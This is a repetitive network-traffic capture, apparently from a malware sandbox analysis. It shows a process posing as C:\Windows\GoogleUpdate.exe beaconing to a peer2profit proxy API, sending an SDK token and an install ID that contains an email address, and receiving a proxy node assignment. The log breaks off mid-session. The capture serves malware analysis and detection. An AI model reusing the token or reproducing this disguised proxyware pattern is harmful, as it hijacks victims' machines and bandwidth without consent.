2022-11-24 11:20:50 UTC	7	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.3	49741	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:20:51 UTC	7	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:20:51 UTC	7	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:20:51 UTC	7	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:20:51 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c1f7696e9b64-FRA
2022-11-24 11:20:51 UTC	7	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.3	49744	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:20:51 UTC	8	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:20:51 UTC	8	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:20:51 UTC	8	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:20:51 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c1f9f97a9004-FRA
2022-11-24 11:20:51 UTC	8	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.3	49746	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:20:51 UTC	8	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:20:51 UTC	8	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:20:51 UTC	9	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:20:51 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c1fc5c395c3e-FRA
2022-11-24 11:20:51 UTC	9	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.3	49749	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:20:52 UTC	9	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:20:52 UTC	9	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:20:52 UTC	9	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:20:52 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c201ebf19c0c-FRA
2022-11-24 11:20:52 UTC	9	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.3	49753	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:20:53 UTC	10	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:20:53 UTC	10	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:20:53 UTC	10	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:20:53 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c2063e15912e-FRA
2022-11-24 11:20:53 UTC	10	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.3	49756	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:20:54 UTC	10	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:20:54 UTC	10	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:20:54 UTC	11	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:20:54 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c209b96c9bc8-FRA
2022-11-24 11:20:54 UTC	11	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.3	49759	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:20:54 UTC	11	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:20:54 UTC	11	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:20:54 UTC	11	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:20:54 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c20d3b5a911e-FRA
2022-11-24 11:20:54 UTC	12	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.3	49762	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:20:55 UTC	12	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:20:55 UTC	12	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:20:55 UTC	12	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:20:55 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c212bd819b9a-FRA
2022-11-24 11:20:55 UTC	12	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.3	49767	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:20:55 UTC	12	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:20:55 UTC	13	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:20:56 UTC	13	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:20:56 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c2156f1f9bf2-FRA
2022-11-24 11:20:56 UTC	13	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49714	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:20:46 UTC	1	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:20:46 UTC	1	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:20:47 UTC	1	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:20:47 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c1ddcec69bf2-FRA
2022-11-24 11:20:47 UTC	1	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.3	49770	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:20:56 UTC	13	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:20:56 UTC	13	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:20:56 UTC	13	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:20:56 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c2183ae790c6-FRA
2022-11-24 11:20:56 UTC	14	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.3	49774	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:20:57 UTC	14	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
